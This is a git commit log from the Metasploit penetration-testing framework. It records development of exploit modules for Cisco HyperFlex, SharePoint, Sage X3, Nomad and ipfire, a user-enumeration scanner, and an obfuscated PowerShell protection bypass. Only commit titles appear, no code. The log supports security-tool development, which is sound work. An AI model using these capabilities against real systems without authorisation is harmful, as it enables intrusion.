dwelch-r7 a68a62dce5 Land #15352, Ensure msfdb init can be used for starting the database 2021-06-18 13:07:10 +01:00
Yann Castel 211bf4351d adding delay option 2021-06-18 11:32:15 +02:00
Yann Castel 1d2e3212d3 using MIME + added some guards 2021-06-18 10:43:30 +02:00
Hakyac 7781d9ff1e Update modules/exploits/linux/http/rconfig_authenticated_rce.rb
Co-authored-by: Jeffrey Martin <jeffrey_martin@rapid7.com>
2021-06-18 10:22:11 +02:00
Hakyac 1e7737f8b4 Update modules/exploits/linux/http/rconfig_authenticated_rce.rb
Co-authored-by: Jeffrey Martin <jeffrey_martin@rapid7.com>
2021-06-18 10:17:52 +02:00
Alan Foster ae7a978889 Ensure msfdb reinit can be used for starting the database 2021-06-18 09:13:48 +01:00
Hakyac f4bd18c5a3 Update modules/exploits/linux/http/rconfig_authenticated_rce.rb
Co-authored-by: Jeffrey Martin <jeffrey_martin@rapid7.com>
2021-06-18 09:21:00 +02:00
Metasploit f354081d48 automatic module_metadata_base.json update 2021-06-17 12:48:07 -05:00
Spencer McIntyre 397c9ef140 Land #15333, Cisco HyperFlex File Upload RCE 2021-06-17 13:40:39 -04:00
deadjakk dadc59ebbe Added changes requested by @smcintyre-r7
- Updated default port number to match documentation
- Updated the str append to '<<'
- Fixed issue with the login scanner returning false positives
- Removed rank from login scanner
- Removed Custom Executable target in favor of EXE::CUSTOM
- Moved the X3Crypt code out of the exception block
- Added additional checks to the exploit module, the same that were made in login_scanner
- Changed the check function to produce the proper return 'CheckCode' values
2021-06-17 12:39:17 -05:00
Metasploit 645e1512d6 Bump version of framework to 6.0.50 2021-06-17 12:05:05 -05:00
Jack Heysel 281fce0c94 Cisco HyperFlex File Upload RCE module
beta draft

RCE working with linux/x64/meterpreter_reverse_tcp

rubocop

Updated title, removed newlines

Responded to comments

Rubo cop offenses

Update documentation/modules/exploit/linux/http/cisco_hyperflex_file_upload_rce.md

Co-authored-by: wvu <wvu-r7@users.noreply.github.com>

Update modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb

Co-authored-by: wvu <wvu-r7@users.noreply.github.com>

Update modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb

Co-authored-by: wvu <wvu-r7@users.noreply.github.com>

Update modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb

Co-authored-by: wvu <wvu-r7@users.noreply.github.com>

Update modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb

Co-authored-by: wvu <wvu-r7@users.noreply.github.com>

Responded to comments

Rubocop offenses

Added support for Java Dropper

Made changes to Linux Dropper

Rubocop

Improved check method, changed to default staged paylod, removed TODO

Switched to single-quoted strings
2021-06-17 12:38:47 -04:00
pingport80 cc1abe9d1b adding generic process mixin to the windows process mixin 2021-06-17 21:24:13 +05:30
pingport80 8598183e98 add process mixin in the modules which required it 2021-06-17 20:46:04 +05:30
pingport80 c055b1100b fix shellcode_inject module 2021-06-17 18:51:49 +05:30
Yann Castel dca4f3f471 fix download link 2021-06-17 15:19:42 +02:00
Yann Castel 0fda6b348d initial commit 2021-06-17 15:15:59 +02:00
deadjakk a914124887 Merge branch 'SageX3-CVE-2020-7388' of github.com:deadjakk/metasploit-framework into SageX3-CVE-2020-7388 2021-06-17 05:30:59 -05:00
deadjakk 3a9a16f296 Update modules/exploits/x3/x3_adxsrv_auth_bypass_cmd_exec.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2021-07-08 11:01:51 -05:00
deadjakk 3f5e4fb4f2 Update lib/metasploit/framework/login_scanner/x3.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2021-07-08 10:29:24 -05:00
deadjakk 3825b39195 Merge branch 'rapid7:master' into SageX3-CVE-2020-7388 2021-07-07 19:44:25 -05:00
deadjakk 730531a71f removed a false positive in the login_scanner 2021-06-17 05:29:07 -05:00
bwatters 8c09fc569f File tests work except for writing binary data; debugging commented out 2021-06-16 16:22:17 -05:00
Grant Willcox 66da3148d6 Land #15316, Add a call to setsid when forking a new process 2021-06-16 15:16:01 -05:00
deadjakk fa98e9a3a4 Made a number of changes according to review: https://github.com/rapid7/metasploit-framework/pull/15400
- Renamed exploit module to x3_adxsrv_auth_bypass_cmd_exec.rb
- Changed print_bad to fail_with
- Updated Name in module to reflect the auth bypass element
- Updated the rand number generation
- Added error checking to adxdir function return value
- Changed payload variable name -> sage_payload
2021-06-16 14:07:49 -05:00
deadjakk 5ee429fc01 Update modules/exploits/x3/x3_adxsrv_cmd.rb
Co-authored-by: bcoles <bcoles@gmail.com>
2021-07-07 18:54:15 -05:00
deadjakk 15a197b368 Update modules/exploits/x3/x3_adxsrv_cmd.rb
Co-authored-by: bcoles <bcoles@gmail.com>
2021-07-07 18:50:47 -05:00
deadjakk e40b98c5f2 added robocop -a'd files 2021-07-07 12:31:05 -05:00
deadjakk 21446c8455 added Sage X3 modules 2021-07-07 11:14:23 -05:00
Grant Willcox b91c829022 Land #15109, Better handling for incompatible Meterpreter extensions and commands (Round 2) 2021-06-16 11:15:39 -05:00
Metasploit 41fca09bfb automatic module_metadata_base.json update 2021-06-16 10:47:38 -05:00
Grant Willcox 62f9d15ba3 Land #15314, Add Exploit for CVE-2021-31181 (SharePoint RCE) 2021-06-16 10:39:49 -05:00
Metasploit d0798032f7 automatic module_metadata_base.json update 2021-06-16 09:27:39 -05:00
Grant Willcox 6f030af97d Land #15345, Fix reference URL and add in CVE. 2021-06-16 09:19:47 -05:00
guly f243bb1d78 Updated gavazzi_em_login_loot: added CVE
added CVE
2021-06-16 15:24:15 +02:00
Spencer McIntyre 626bbebde2 Remove the remaining mimikatz extension code 2021-06-16 09:10:34 -04:00
Spencer McIntyre 7f4ca31021 Fix a typo and add missing build tuples 2021-06-16 09:04:11 -04:00
Spencer McIntyre 582d64abe8 Add some documentation for the new code 2021-06-16 09:04:11 -04:00
Spencer McIntyre 2e07dc7686 Search extensions for missing Meterpreter commands 2021-06-16 09:04:11 -04:00
Spencer McIntyre 8f8337552a Suggest a Meterpreter payload for an extension 2021-06-16 09:04:11 -04:00
guly d6de658709 fixed reference url
fixed reference url
2021-06-16 10:57:13 +02:00
Alexandre ZANNI 67406e71e4 WordPress wpDiscuz Unauthenticated File Upload Vulnerability 2021-06-15 14:15:30 +02:00
Grant Willcox dc32770fd5 Land #15340, Fix hosts deletion 2021-06-14 22:26:51 -05:00
Metasploit 096a6ddb9b automatic module_metadata_base.json update 2021-06-14 18:08:59 -05:00
Grant Willcox 464dcdf578 Land #15239, ipfire <= 2.25 Core Update 156 pakfire.cgi Authenticated RCE 2021-06-14 18:01:24 -05:00
Metasploit 1b2f744f00 automatic module_metadata_base.json update 2021-06-14 15:49:52 -05:00
Spencer McIntyre f58bbc236f Land #15319, Fix a localization issue 2021-06-14 16:42:19 -04:00
Metasploit a3c240adf5 automatic module_metadata_base.json update 2021-06-14 15:36:21 -05:00
Grant Willcox 537a7763f5 Land #15337, Update apache_activemq_upload_jsp.rb to fix missing checks and add missing slashes to some requests 2021-06-14 15:28:40 -05:00
Alan Foster 8bd2c84f50 Fix hosts deletion 2021-06-14 21:16:03 +01:00
Grant Willcox 5b274770ef Update exploit code to add missing slashes to certain important parts of the code where the exploit might fail if a custom path is supplied, and also improve the error handling in the code overall 2021-06-14 15:02:38 -05:00
Metasploit b6836f36f2 automatic module_metadata_base.json update 2021-06-14 14:17:17 -05:00
pingport80 7c597b4ca2 define error_token as a random alphanumeric string 2021-06-14 23:32:44 +05:30
Gaurav Purswani 622e82cf44 Update modules/post/windows/gather/enum_hyperv_vms.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2021-06-14 23:23:12 +05:30
Gaurav Purswani 59928bf941 Update modules/post/windows/gather/enum_hyperv_vms.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2021-06-14 23:23:04 +05:30
adfoster-r7 e40fcafbf1 Land #15339, fix typo in wp_admin_shell_upload.md 2021-06-14 18:04:30 +01:00
adfoster-r7 fb0e0f88a9 Land #15215, HashiCorp Nomad exec RCE 2021-06-14 17:49:36 +01:00
Wyatt Dahlenburg 1789c7b070 Adding notes to Nomad Module 2021-06-14 10:39:23 -05:00
Spencer McIntyre d1be69eae6 Implement changes based on PR feedback 2021-06-14 10:15:27 -04:00
pingport80 9929d1c11d fix new rubocop errors 2021-06-14 18:25:22 +05:30
adfoster-r7 c62f89a9e9 Updated Definition of Module Reliability, Side Effects, and Stability (markdown) 2021-06-14 11:34:04 +01:00
pingport80 beba2a6e46 add error_token in case the command fails and remove regexp from psh_exec 2021-06-14 15:02:39 +05:30
Yann Castel d8c0b67c96 Merge branch 'nscp_pe' of github.com:Hakyac/metasploit-framework into nscp_pe 2021-06-14 10:08:20 +02:00
Hakyac c9a0e3b58a Update modules/exploits/windows/local/nscp_pe.rb
Co-authored-by: agalway-r7 <agalway@rapid7.com>
2021-06-14 10:08:59 +02:00
Yann Castel 1e6fcd8e3a Merge branch 'nscp_pe' of github.com:Hakyac/metasploit-framework into nscp_pe 2021-06-14 10:07:14 +02:00
Hakyac b8bf750886 Update modules/exploits/windows/local/nscp_pe.rb
Co-authored-by: agalway-r7 <agalway@rapid7.com>
2021-06-14 10:07:01 +02:00
Florian CASAGRANDE 6e3e27984b Update wp_admin_shell_upload.md 2021-06-13 13:53:08 +02:00
0xShoreditch 8eddecc858 Update apache_activemq_upload_jsp.rb
Corrected a minor error where the URI and filesystem path were not separated.
2021-06-13 07:27:56 +01:00
Metasploit 87386a57dd automatic module_metadata_base.json update 2021-06-12 14:27:33 -05:00
h00die 0f16c1a633 Land #14836, emby ssrf module and scanner for cve-2020-26948 2021-06-12 15:18:12 -04:00
h00die 65bbe021bc updated docs 2021-06-12 15:08:53 -04:00
h00die d58eb309e6 update module location 2021-06-12 15:07:03 -04:00
agalway-r7 e27ff89b86 improve readability
Co-authored-by: wvu <wvu-r7@users.noreply.github.com>
2021-06-11 12:58:00 +01:00
adfoster-r7 f83b21e85c Land #15187, no longer create msfdb webservice by default 2021-06-11 11:14:46 +01:00
adfoster-r7 b0eda8f676 Updated Definition of Module Reliability, Side Effects, and Stability (markdown) 2021-06-11 11:04:11 +01:00
adfoster-r7 3b1ce614dd Updated Definition of Module Reliability, Side Effects, and Stability (markdown) 2021-06-11 11:03:56 +01:00
adfoster-r7 8afa2e8142 Updated Definition of Module Reliability, Side Effects, and Stability (markdown) 2021-06-11 10:56:47 +01:00
dwelch-r7 3466298940 Updated Definition of Module Reliability, Side Effects, and Stability (markdown) 2021-06-11 10:54:39 +01:00
adfoster-r7 6abdeb1ac1 Land #15247, add rubocop rule to enforce Notes in exploit module info 2021-06-11 10:45:38 +01:00
Grant Willcox e3a0228f79 Adjust exploit module title for rubocop compliance 2021-06-10 16:54:35 -05:00
Grant Willcox e07561c904 Land #15328, Fix get_processes for some shell sessions 2021-06-10 16:44:08 -05:00
Metasploit 9245293d4d Bump version of framework to 6.0.49 2021-06-10 12:08:15 -05:00
Spencer McIntyre edee95bbb2 Update the check to not fail if a COOKIE is used 2021-06-10 11:29:07 -04:00
Grant Willcox de8180b666 Update module title to correct state affected versions 2021-06-10 09:42:26 -05:00
MucahitSaratar ea7eaba7a9 added cve
Signed-off-by: MucahitSaratar <trregen222@gmail.com>
2021-06-10 09:35:42 -05:00
MucahitSaratar 4796779a29 Add more fixes to the module and documentation 2021-06-10 09:35:10 -05:00
Grant Willcox 038d0b1334 Add in autocheck compatability, update the documentation and output to be clearer, minimize traffic sent, fix up invalid scoping of variables, randomize data where possible, and add in exploit notes 2021-06-10 09:34:52 -05:00
MucahitSaratar 83caaccc6a adding backup
Signed-off-by: MucahitSaratar <trregen222@gmail.com>
2021-06-10 09:34:47 -05:00
MucahitSaratar 8e16d4a1c7 ipfire 2.25 core 156 remote code execution
Signed-off-by: MucahitSaratar <trregen222@gmail.com>
2021-06-10 09:34:13 -05:00
Yann Castel 8557d73a65 better error handling 'get_auth_token' 2021-06-10 09:54:06 +02:00
Hakyac da866d13e8 Update modules/exploits/windows/local/nscp_pe.rb
Co-authored-by: agalway-r7 <agalway@rapid7.com>
2021-06-10 09:32:24 +02:00
Hakyac 82ce7e2ab3 Update modules/exploits/windows/local/nscp_pe.rb
Co-authored-by: agalway-r7 <agalway@rapid7.com>
2021-06-10 09:32:01 +02:00
Hakyac 7f3bd1a61a Update modules/exploits/windows/local/nscp_pe.rb
Co-authored-by: agalway-r7 <agalway@rapid7.com>
2021-06-10 09:21:04 +02:00
dwelch-r7 6abd30522e Rename variables ot be more clear 2021-06-10 02:56:24 +01:00
btnz-k f684955537 updated documentation, modified var type 2021-06-09 15:26:29 -07:00
Spencer McIntyre 206e6b01e4 Add the second fork after calling setsid 2021-06-09 17:52:13 -04:00
A Galway d9d012f7fd enables powershell sessions to use the read_file method 2021-06-09 20:22:15 +01:00
pingport80 669586a3ed fix localization issue in windows/enum_hyperv_vms and chomp extra data from psh_exec method 2021-06-09 23:35:27 +05:30
Spencer McIntyre 5c5728a973 Stop applying prepends twice 2021-06-09 10:27:10 -04:00
Yann Castel 87847cf886 fix typo 2021-06-09 15:11:55 +02:00
Yann Castel ebc8dba921 intial commit 2021-06-09 15:10:03 +02:00
dwelch-r7 8b61498ebb Remove unused variables 2021-06-09 13:06:22 +01:00
dwelch-r7 5d421688a2 Refactor prompts and rework clearing of stored database 2021-06-09 10:55:15 +01:00
Spencer McIntyre 0980c67797 Golf off one byte from x64's PrependFork 2021-06-08 17:29:15 -04:00
Spencer McIntyre ae3715e6bc Add a call to setsid when forking a new process 2021-06-08 16:44:46 -04:00
Spencer McIntyre 3afe3ebfa3 Add the module docs 2021-06-08 15:23:24 -04:00
Spencer McIntyre 325ecfedff Add some error handling while extracting the key 2021-06-08 14:58:58 -04:00
bcoles 65fed5ee3f Note that CheckCode may return an optional description 2021-06-09 00:10:20 +10:00
bcoles fe1c8f2ac1 Fix typos and syntax 2021-06-08 23:59:01 +10:00
pingport80 6dca1d36ab add check for powershell 2021-06-08 18:09:36 +05:30
Spencer McIntyre 4ccc468dab Add docs to the SharePoint mixin 2021-06-07 16:04:08 -04:00
Spencer McIntyre 64077e1395 Add and use a new sharepoint mixin 2021-06-07 15:25:07 -04:00
Spencer McIntyre 8cc220ccbc Initial commit of CVE-2021-31181 2021-06-07 13:37:28 -04:00
btnz-k 93f0f62b05 MSFTIDY 2021-06-07 08:40:11 -07:00
btnz-k 3b14151bda Post-'rubocop -a' job. 2021-06-06 14:56:55 -07:00
pingport80 ca5d3ea162 fix dir method for windows and added for powershell 2021-06-06 21:47:51 +05:30
h00die eb4170678b use faker 2021-06-06 11:57:23 -04:00
Spencer McIntyre 9c364674df Fix instances where the token is in the output 2021-06-05 21:33:23 -04:00
Spencer McIntyre 1ec0c3c299 Fix up some minor typos 2021-06-04 13:31:16 -04:00
Spencer McIntyre 20abf44f26 Update the datastore options documentation 2021-06-04 12:07:43 -04:00
btnz-k 0fd49a595e Updated to pass msftidy. 2021-06-03 13:15:18 -07:00
btnz-k 267a07166c Updated per R7 requests. 2021-06-03 13:08:08 -07:00
dwelch-r7 d793e1b30c Enforce more notes add more tests 2021-06-02 22:31:32 +01:00
h00die 3f1bb4b51e rename module, add docs 2021-05-30 14:48:39 -04:00
h00die 0c3a693bef working exploit and docs 2021-05-30 14:37:11 -04:00
Hakyac 8d5a987037 Update cve_2021_27850_apache_tapestry_hmac_key.md 2021-05-28 10:45:53 +02:00
Yann Castel 31349f9d53 Merge branch 'cve_2021_27850' of github.com:Hakyac/metasploit-framework into cve_2021_27850 2021-05-28 09:54:15 +02:00
Yann Castel 13f916c687 Installation info in documentation 2021-05-28 09:53:59 +02:00
Hakyac 3b06bdc2e1 Update modules/auxiliary/gather/http/cve_2021_27850_apache_tapestry_hmac_key.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-05-28 09:01:32 +02:00
Yann Castel 61c9b9772e omission of rubocop 2021-05-27 15:09:02 +02:00
Yann Castel d7a8986af9 target_uri + fix targeted_class param + more description 2021-05-27 15:05:27 +02:00
Hakyac ddcc42b844 Update modules/auxiliary/gather/http/cve_2021_27850_apache_tapestry_hmac_key.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-05-26 15:35:04 +02:00
Hakyac 22f25d7a7f Update modules/auxiliary/gather/http/cve_2021_27850_apache_tapestry_hmac_key.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-05-26 15:34:54 +02:00
Hakyac 2cfc97160c Update documentation/modules/auxiliary/gather/http/cve_2021_27850_apache_tapestry_hmac_key.md
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-05-26 15:34:45 +02:00
Hakyac d766f89a3f Update modules/auxiliary/gather/http/cve_2021_27850_apache_tapestry_hmac_key.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-05-26 15:34:41 +02:00
Hakyac de05c11095 Update documentation/modules/auxiliary/gather/http/cve_2021_27850_apache_tapestry_hmac_key.md
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-05-26 15:34:10 +02:00
Brendan 6688301af3 Created Metasploit Breaking Changes (markdown) 2021-05-26 08:15:58 -05:00
Wyatt Dahlenburg eb76aae2a7 Merge branch 'master' of github.com:rapid7/metasploit-framework into hashicorp_nomad 2021-05-25 15:56:13 -05:00
Spencer McIntyre 82c078c888 Updates for psexec usage 2021-05-25 14:38:52 -04:00
Spencer McIntyre 7c6afc33d2 Update the web_delivery module 2021-05-25 14:38:52 -04:00
Spencer McIntyre ebab5f1e85 Update the powershell mixin 2021-05-25 14:38:52 -04:00
Spencer McIntyre 2dc2831d7a Obfuscate the ScriptBlock class reference 2021-05-25 14:38:52 -04:00
Spencer McIntyre 4920800340 Add a null check to the PSH bypass code
Powershell version 3 does not have
`System.Management.Automation.AmsiUtils` so check that it's present
before setting the field.
2021-05-25 14:38:52 -04:00
Spencer McIntyre eddb6af650 Add block level randomization for the PSH bypass 2021-05-25 14:38:52 -04:00
Spencer McIntyre 38b45380f4 Fix and process block edges within the GraphML 2021-05-25 14:38:50 -04:00
Spencer McIntyre 694617b12c Use an obfuscated stub to bypass PSH protections 2021-05-25 14:36:17 -04:00
Spencer McIntyre 4ab980b316 Update Shuffle to protect more of its API 2021-05-25 14:36:13 -04:00
dwelch-r7 85961be02e Ran rubocop and tidied up 2021-05-25 13:25:34 +01:00
dwelch-r7 34dec4f026 Add rubocop rule to enforce presence of SideEffects in exploit module info 2021-05-25 00:58:14 +01:00
Spencer McIntyre 225f1d7da7 Updated Get Started Writing an Exploit (markdown) 2021-05-20 14:03:34 -04:00
Spencer McIntyre f96cea60c1 Updated How to get started with writing an auxiliary module (markdown) 2021-05-20 14:01:07 -04:00
Yann Castel 72928e0865 module moved to a better location (again) and renamed 2021-05-20 16:47:13 +02:00
dwelch-r7 962dcf1ae7 Clear the default database connection if using database only 2021-05-20 01:08:47 +01:00
Wyatt Dahlenburg 359b47a146 AutoCheck + JSON Parsing + WfsDelay 2021-05-19 13:42:59 -05:00
Spencer McIntyre 48272435c2 Fix a bug in GraphML parser for escaped strings
The GraphML parser was failing to properly handle escaped strings within
XML nodes. The #characters method was being called multiple times
causing the preceding value to be overwritten rather than appended to.
2021-05-19 12:44:37 -04:00
Spencer McIntyre 86df5b0122 Add the data file for bypassing PSH protection 2021-05-19 12:42:43 -04:00
dwelch-r7 2c94c7cd85 Ask the user if they wish to start the webservice 2021-05-19 13:15:32 +01:00
Yann Castel 2ef3eadcd4 add description for this module 2021-05-19 11:49:14 +02:00
Yann Castel 99799c177f now is validated by robocop 2021-05-19 10:57:05 +02:00
Wyatt Dahlenburg 6dccf0dd20 Adding Nomad documentation 2021-05-18 10:12:04 -05:00
Wyatt Dahlenburg 20415172a4 Support additional payload parameters 2021-05-18 09:39:46 -05:00
Yann Castel d4c5f59117 file moved to a better place 2021-05-18 09:11:41 +02:00
Wyatt Dahlenburg 7427c68057 Add HashiCorp Nomad Job Exploit 2021-05-17 16:16:21 -05:00
Spencer McIntyre f3f479fda9 Handle powershell protection bypasses in MSF 2021-05-17 16:00:00 -04:00
Yann Castel 2005138017 add CVE-2021-27850 Apache Tapestry HMAC secret key leak 2021-05-17 17:13:09 +02:00
adfoster-r7 b2bee33c1e Updated How to Send an HTTP Request Using HttpClient (markdown) 2021-05-14 14:54:20 +01:00
adfoster-r7 dc3a0232bf Updated How to Send an HTTP Request Using HttpClient (markdown) 2021-05-14 14:53:53 +01:00
dwelch-r7 086f2961dc msfdb default to database only 2021-05-12 11:48:56 +01:00
agalway-r7 a51f70c244 Adds documentation for the Cookie & CookieJar send_request_cgi functionality 2021-05-07 14:20:48 +01:00
Ashley Donaldson 278c6532d0 Implemented suggested changes.
Download directly to loot directory.
2021-05-07 09:28:31 +10:00
Ashley Donaldson 422b6380eb Fix check against dumping own process 2021-05-06 09:34:30 +10:00
Ashley Donaldson 0836f77754 Added documentation for the memory dump module 2021-05-05 19:12:13 +10:00
Ashley Donaldson a47b1af60b Added module to dump memory for processes, using Windows Meterpreter 2021-05-05 18:12:40 +10:00
Pedro Ribeiro 8afe9a7cb6 Merge pull request #32 from rapid7/master
aasas
2021-05-02 16:49:49 +07:00
Pedro Ribeiro eca5609b33 Merge pull request #31 from rapid7/master
fffff
2021-04-30 16:38:17 +07:00
btnz-k 9d23121fa0 Updated documentation content. 2021-04-28 14:02:06 -07:00
btnz-k a223baf0a3 Updated emby_version_ssrf to include timeout. Updated documentation filenames and content. 2021-04-28 13:07:51 -07:00
btnz-k b3b9d89bd1 changes to meet r7 reqs 2021-04-28 12:41:41 -07:00
btnz 13c619cb7e Add files via upload 2021-04-28 10:37:39 -07:00
btnz a5f68fc043 Add files via upload 2021-04-28 10:36:55 -07:00
wvu 9937b867a6 Updated How to write a browser exploit using BrowserExploitServer (markdown) 2021-04-27 16:11:22 -05:00
Jeffrey Martin e379209ea8 add smashery to committers 2021-04-19 12:39:29 -05:00
Pearce Barry 16c4a3d423 Updated Downloads by Version (textile) 2021-04-01 15:50:37 -05:00
Spencer McIntyre 226fc66a07 Add a note on Python versions 2021-04-01 10:01:28 -04:00
btnz-k db376a9dd8 Working R7 changes to meet requirements 2021-03-26 14:09:49 -07:00
Brian Halbach 1c3e2d145e Update modules/auxiliary/scanner/http/jira_user_enum.rb
Co-authored-by: cdelafuente-r7 <56716719+cdelafuente-r7@users.noreply.github.com>
2021-03-25 13:15:26 -05:00
Brian Halbach c2f0b2a862 Update modules/auxiliary/scanner/http/jira_user_enum.rb
Co-authored-by: cdelafuente-r7 <56716719+cdelafuente-r7@users.noreply.github.com>
2021-03-23 16:23:32 -05:00
Brian Halbach 3d3155c8b6 Update modules/auxiliary/scanner/http/jira_user_enum.rb
Co-authored-by: cdelafuente-r7 <56716719+cdelafuente-r7@users.noreply.github.com>
2021-03-23 16:23:02 -05:00
btnz aa4bbcba8f Update emby_scan.rb
added references
2021-03-22 17:09:24 -07:00
btnz 5880fe33a4 Update emby_scan.rb
removed version, added disclosure date
2021-03-22 17:02:06 -07:00
btnz 05744a2d22 Update emby_scan.rb
Description Updated
2021-03-22 16:56:50 -07:00
Brian Halbach 811f16cf67 msftidy changes. 2021-03-17 12:56:41 -05:00
Brian Halbach f5ad5362fd removed DB_ALL_USERS from the deregister_options() 2021-03-17 12:50:03 -05:00
Jeffrey Martin fc88ee0413 Updated GSoC How-to 2021-03-17 09:30:49 -05:00
Spencer McIntyre 1d307c8154 Fix a couple of minor typos 2021-03-16 17:45:20 -04:00
Spencer McIntyre 7b43458d37 Promote the Regenerating section to H2 2021-03-12 12:06:08 -05:00
Shelby Pace fae46575aa Updated Generating ysoserial Java serialized objects (markdown) 2021-03-12 11:00:41 -06:00
Spencer McIntyre d6a2a2cd43 Update the documentation now that 14732 has been landed 2021-03-12 11:41:42 -05:00
Brian Halbach 31201b4cdd Update jira_user_enum.rb 2021-03-11 11:55:27 -06:00
Brian Halbach 698b4e11c2 Updated Author info 2021-03-09 14:22:50 -06:00
Brian Halbach f9a4bac0ff updated jira_user_enum with msftidy_docs 2021-03-09 12:00:39 -06:00
btnz f7ab75a60e Update emby_scan.rb
removed superfluous comments
2021-03-08 15:24:54 -08:00
Shelby Pace b137b749a2 add wiki page for favorite 2021-03-08 13:21:15 -06:00
Grant Willcox f3ad052348 Updated Using Metasploit (markdown) 2021-03-08 11:54:17 -06:00
Grant Willcox 2208df027e Add link to TryHackMe room and also note the Offensive Security documentation is slightly outdated now in some places. 2021-03-08 11:53:34 -06:00
Grant Willcox 1dd55291d9 Updated Home (markdown) 2021-03-08 11:20:59 -06:00
Grant Willcox a049dd89fa Updated Navigating Metasploit's Codebase (markdown) 2021-03-08 11:18:36 -06:00
Grant Willcox 1208d309ef Created Navigating Metasploit's Codebase (markdown) 2021-03-08 10:53:09 -06:00
btnz eab376d58c Update emby_version.rb
rubocop
2021-03-01 16:30:04 -08:00
btnz 7218eb4615 Update emby_version.rb
rubocop updates.
2021-03-01 15:46:17 -08:00
btnz c7735d7dff Update emby_scan.rb
rubocop fixes
2021-03-01 15:37:13 -08:00
btnz 0615fe8b35 Update emby_version.rb
rubocop fixes
2021-03-01 15:33:09 -08:00
btnz b1b32fba82 Update emby_version.rb 2021-03-01 15:29:48 -08:00
btnz b8e48b9fc0 Update emby_version.rb
rubocop updates
2021-03-01 15:27:23 -08:00
btnz 007ac3ffd0 Update emby_scan.md
updated w/ example
2021-03-01 15:17:38 -08:00
btnz a7e9d760ba Update emby_version.md
included successful example.
2021-03-01 14:01:01 -08:00
btnz 42a9601cc7 Update emby_version.rb
update per rubocop
2021-03-01 13:29:52 -08:00
btnz d53d84faef Update emby_scan.rb
cleanup per rubocop
2021-03-01 13:29:19 -08:00
btnz f36214a891 Update emby_version.rb 2021-03-01 12:27:50 -08:00
btnz f610985553 Update emby_version.rb 2021-03-01 12:21:00 -08:00
btnz 5209de0026 Update emby_scan.rb 2021-03-01 12:20:24 -08:00
btnz 4e5cbeb17b Add files via upload 2021-03-01 12:06:35 -08:00
btnz de10feba61 Add files via upload 2021-03-01 12:06:06 -08:00
btnz d853b2b511 Add files via upload 2021-03-01 10:33:49 -08:00
btnz 6220f6b366 Add files via upload 2021-03-01 10:31:39 -08:00
Jeffrey Martin 017f95ac17 fix typo 2021-02-22 09:48:45 -06:00
Spencer McIntyre d1fef9e280 Note info -d will show the relevant pull requests for a module 2021-02-22 07:45:33 -05:00
Jeffrey Martin d227dbc194 add difficulty to open auth retention 2021-02-18 11:02:03 -06:00
Jeffrey Martin 0c1df63c60 add h00die's active auth retention idea 2021-02-18 11:00:07 -06:00
Jeffrey Martin 7d8a1cdf8e update for 2021 link 2021-02-09 15:20:02 -06:00
Jeffrey Martin 6a4fe3f600 add 2021 GSoC ideas page 2021-02-09 10:15:39 -06:00
Spencer McIntyre b4b77d0623 Update the ysoserial java documentation 2021-02-09 10:20:08 -05:00
acammack-r7 a20d850bdc Add moved_from 2021-02-04 10:03:57 -05:00
adfoster-r7 a9a5b4d513 Add note about loading Go/Python modules 2021-02-02 14:00:32 +00:00
adfoster-r7 84110ed3b9 Document that modules must be marked as executable 2021-02-02 13:57:14 +00:00
Brian Halbach 93e27b55ab Add user credential reporting to modules/auxiliary/scanner/http/jira_user_enum.rb
Co-authored-by: Jeffrey Martin <jeffrey_martin@rapid7.com>
2021-01-29 11:16:03 -06:00
bcoles 0db7d59da9 Remove vprint_debug - [v]print_debug is no longer used by the framework 2021-01-29 11:41:40 +11:00
Brian Halbach faf275396d Used rubocop to cleanup jira_user_enum.rb 2021-01-28 15:40:03 -06:00
Brian Halbach 9ff9f438be Removed broken credential reporting
This technically only finds usernames and not full sets of credentials so I removed the credential reporting method call. Instead, I have the module print out the number of users it found followed by a list of those users. I feel this will be more useful to the users.
2021-01-28 15:30:18 -06:00
Brian Halbach 0c50e0e731 removing commented out options note needed in modules/auxiliary/scanner/http/jira_user_enum.rb
Co-authored-by: Jeffrey Martin <jeffrey_martin@rapid7.com>
2021-01-27 16:10:59 -06:00
Brian Halbach 737a0db5a6 Removing Options already built into AuthBrute in modules/auxiliary/scanner/http/jira_user_enum.rb
Co-authored-by: Jeffrey Martin <jeffrey_martin@rapid7.com>
2021-01-27 15:55:51 -06:00
Brian Halbach b48c413bcc Redo Jira_User_enum Module to use AuthBrute mixin 2021-01-21 12:07:47 -06:00
Brian Halbach 9e8f4dc764 Update modules/auxiliary/scanner/http/jira_user_enum.rb
Co-authored-by: Jeffrey Martin <jeffrey_martin@rapid7.com>
2021-01-19 13:09:22 -06:00
Brian Halbach 4e6bcc567a Update modules/auxiliary/scanner/http/jira_user_enum.rb
Co-authored-by: Jeffrey Martin <jeffrey_martin@rapid7.com>
2021-01-19 13:09:10 -06:00
Brian Halbach ec2a35c3f2 Update jira_user_enum.rb 2021-01-19 11:08:11 -06:00
Brian Halbach a8685f2ab0 Added Documentation for jira_user_enum module 2021-01-18 10:46:02 -06:00
Brian Halbach d95e63c110 Add Jira User Enum Module 2021-01-18 10:13:16 -06:00
h00die e24273e9a3 magic_quotes 2021-01-02 13:38:15 -05:00
Spencer McIntyre 0f70fc762b Note the compatibility changes for Meterpreter 2020-12-17 15:00:46 -05:00
Pearce Barry 80f6c9557d Updated Downloads by Version (textile) 2020-10-28 13:23:15 -05:00
h00die e727f428ea add one column note 2020-10-27 19:32:20 -04:00
h00die 2cbfbd44d7 Updated SQL Injection (SQLi) Libraries (markdown) 2020-10-26 19:44:34 -04:00
h00die ba95d59482 Created SQL Injection (SQLi) Libraries (markdown) 2020-10-26 19:41:54 -04:00
